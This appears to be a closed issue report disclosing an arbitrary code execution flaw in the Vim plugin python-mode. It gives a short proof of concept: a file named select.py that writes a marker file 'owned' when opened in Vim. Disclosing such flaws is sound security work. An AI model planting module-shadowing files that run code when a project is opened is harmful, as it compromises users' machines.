Closed
Description
Hi,
It is possible to achieve arbitrary code execution when using python-mode.
➜ cat > select.py
import os
homedir = os.path.expanduser("~")
with open(os.path.join(homedir, "owned"), "w") as f:
f.write("owned")
print "owned"
➜ vim select.py
owned
Press ENTER or type command to continue
➜ cat ~/owned
owned
➜ vim --version
VIM - Vi IMproved 7.3 (2010 Aug 15, compiled Oct 23 2012 18:42:18)
Included patches: 1-712
Compiled by ArchLinux
Care should be taken when opening source code from untrusted sources.
Regards,
Dhiru
Metadata
Metadata
Assignees
Labels
No labels